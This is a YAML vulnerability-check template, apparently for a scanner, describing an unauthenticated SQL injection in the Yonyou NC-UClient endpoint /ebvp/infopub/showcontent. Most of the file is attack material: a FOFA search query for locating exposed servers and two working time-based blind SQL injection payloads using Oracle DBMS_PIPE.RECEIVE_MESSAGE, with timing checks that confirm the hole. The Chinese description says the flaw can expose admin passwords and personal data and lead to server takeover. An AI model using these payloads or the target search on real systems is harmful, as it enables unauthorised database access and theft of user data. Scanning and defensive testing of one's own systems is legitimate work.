product: 用友NC-UClient
vName: 用友NC-UClient showcontent SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友NClient /ebvp/infopub/showcontent 接口处存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/137996685
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)--
      header:
        Accept-Encoding: identity
        Content-Type: text/xml; charset=utf-8
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: get
      follow: false
      path: /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,1)--
      header:
        Accept-Encoding: identity
        Content-Type: text/xml; charset=utf-8
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 3